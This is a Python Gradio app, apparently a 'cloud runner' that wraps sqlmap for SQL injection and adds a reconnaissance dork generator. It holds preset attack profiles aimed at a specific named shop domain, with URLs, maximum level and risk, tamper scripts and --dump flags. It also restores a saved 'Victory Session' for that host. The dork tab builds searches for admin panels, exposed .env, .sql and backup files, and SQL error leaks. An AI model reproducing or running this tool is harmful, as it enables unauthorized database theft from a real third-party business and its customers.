import gradio as gr import subprocess import os import shutil from pathlib import Path # --- Session Restoration Logic --- def restore_session(): # SQLMap in Docker uses /root/.local/share/sqlmap/output/ session_source = "session.sqlite" target_base = Path("/root/.local/share/sqlmap/output/hashi.ae") if os.path.exists(session_source): try: target_base.mkdir(parents=True, exist_ok=True) shutil.copy(session_source, target_base / "session.sqlite") # Also try the www. variant target_www = Path("/root/.local/share/sqlmap/output/www.hashi.ae") target_www.mkdir(parents=True, exist_ok=True) shutil.copy(session_source, target_www / "session.sqlite") return f"✅ Victory Session Injected into {target_base}" except Exception as e: return f"⚠️ Session restore warning: {str(e)}" return "ℹ️ No session file found in repository." def run_sqlmap(url, threads, level, risk, tamper, techn, proxy, extra_args): # Restore session first session_status = restore_session() if not url: yield f"{session_status}\n❌ Error: Target URL is required." return # Base command cmd = ["python3", "/app/sqlmap-dev/sqlmap.py", "-u", url, "--batch"] # Performance & Level cmd += ["--threads", str(int(threads))] cmd += ["--level", str(int(level))] cmd += ["--risk", str(int(risk))] # Specific options if tamper: cmd += ["--tamper", tamper] if techn: cmd += ["--technique", techn] if proxy: cmd += ["--proxy", proxy] if extra_args: cmd += extra_args.split() yield f"{session_status}\n🚀 Launching SQLMAP Cloud Runner...\n🛰️ Command: {' '.join(cmd)}\n\n" try: process = subprocess.Popen( cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True, bufsize=1, universal_newlines=True ) full_log = "" for line in process.stdout: full_log += line yield full_log process.wait() if process.returncode == 0: yield full_log + "\n✅ Scan completed successfully." else: yield full_log + f"\n⚠️ Scan stopped with return code {process.returncode}." except Exception as e: yield f"❌ Fatal Error: {str(e)}" # Pre-filled shortcuts def set_hashi_victory(): return ( "https://hashi.ae/shop/page/4/?add-to-cart=638", 10, 5, 3, "", "U", "", "--dbms=Oracle --dump --force-ssl --unstable --random-agent --no-cast" ) def set_search_attack(): return ( "https://hashi.ae/?s=iphone", 10, 5, 3, "space2comment", "BEU", "", "--dbms=Oracle --dump --force-ssl --unstable --random-agent --no-cast" ) def set_mysql_attack(): return ( "https://hashi.ae/?s=iphone", 10, 5, 3, "space2comment", "BEU", "", "--dbms=MySQL --dump --force-ssl --random-agent --no-cast" ) # --- Dork Studio Logic --- def generate_dorks(domain, targeted_extensions, find_admin, find_files, find_errors): dorks = [] base = f"site:{domain}" if domain else "" if find_admin: keywords = ["admin", "login", "dashboard", "portal", "cpanel", "wp-admin"] for k in keywords: dorks.append(f"Admin Search: {base} inurl:{k}") if find_files: exts = ["env", "log", "sql", "bak", "txt", "config"] if targeted_extensions: exts += targeted_extensions.split(",") for ext in exts: if ext.strip(): dorks.append(f"File Exposure ({ext.strip()}): {base} ext:{ext.strip()}") dorks.append(f"{base} intitle:\"index of\"") if find_errors: errors = ["SQL syntax", "warning: mysql_", "unclosed quotation mark", "syntax error"] for err in errors: dorks.append(f"Error Leak: {base} intext:\"{err}\"") return "\n".join(dorks) with gr.Blocks(theme=gr.themes.Soft(primary_hue="blue", secondary_hue="slate")) as demo: gr.Markdown("# 🌊 SLMP Cloud Runner v2.0 - Ultra Speed 🌩️") gr.Markdown("Deploy SQLMAP in the cloud for maximum bandwidth. Now includes Alpha Recon Studio.") with gr.Tabs(): # TAB 1: ATTACK RUNNER with gr.TabItem("⚔️ Attack Runner"): with gr.Row(): with gr.Column(scale=2): url_input = gr.Textbox(label="🎯 Target URL", placeholder="https://example.com/page.php?id=1") with gr.Tabs(): with gr.TabItem("🚀 Performance"): with gr.Row(): threads_input = gr.Slider(minimum=1, maximum=10, step=1, value=10, label="Threads") level_input = gr.Slider(minimum=1, maximum=5, step=1, value=5, label="Level") risk_input = gr.Slider(minimum=1, maximum=3, step=1, value=3, label="Risk") with gr.TabItem("🛡️ Advanced"): tamper_input = gr.Textbox(label="🧪 Tampers", placeholder="space2comment,randomcase") techn_input = gr.Textbox(label="📡 Technique", placeholder="U (UNION), B (Blind), etc.") proxy_input = gr.Textbox(label="🔌 Proxy (Optional)", placeholder="http://127.0.0.1:8080") extra_input = gr.Textbox(label="⚙️ Extra Arguments", placeholder="--dbms=Oracle --dump --batch") with gr.Row(): btn_run = gr.Button("🔥 START SCAN", variant="primary") with gr.Row(): btn_hashi = gr.Button("🏰 Hashi Victory", variant="secondary") btn_search = gr.Button("🔍 Search (Oracle)", variant="stop") btn_mysql = gr.Button("🐬 Search (MySQL - Plan D)", variant="secondary") btn_stop = gr.Button("🛑 STOP", variant="stop") with gr.Column(scale=3): output_log = gr.Code(label="📊 LIVE CLOUD LOGS", language="markdown", interactive=False, lines=30) # TAB 2: RECON STUDIO (Merged) with gr.TabItem("🦅 Alpha Recon Studio"): with gr.Row(): with gr.Column(): domain_input = gr.Textbox(label="Target Domain", placeholder="example.com") ext_input = gr.Textbox(label="Custom Extensions", placeholder="jsp, php, asp") with gr.Group(): check_admin = gr.Checkbox(label="Find Admin Panels", value=True) check_files = gr.Checkbox(label="Find Sensitive Files", value=True) check_errors = gr.Checkbox(label="Find SQL Errors", value=True) btn_gen = gr.Button("🔍 Generate Recon Dorks", variant="primary") with gr.Column(): dork_output = gr.Code(label="Generated Dorks", language="text", lines=20) # Event handlers Runner btn_run.click(run_sqlmap,inputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input], outputs=output_log, queue=True) btn_hashi.click(set_hashi_victory, outputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input]) btn_search.click(set_search_attack, outputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input]) btn_mysql.click(set_mysql_attack, outputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input]) # Event handlers Recon btn_gen.click(generate_dorks, inputs=[domain_input, ext_input, check_admin, check_files, check_errors], outputs=dork_output) if __name__ == "__main__": print("✨ SLMP Panel Live.") demo.queue().launch(server_name="0.0.0.0", server_port=7860)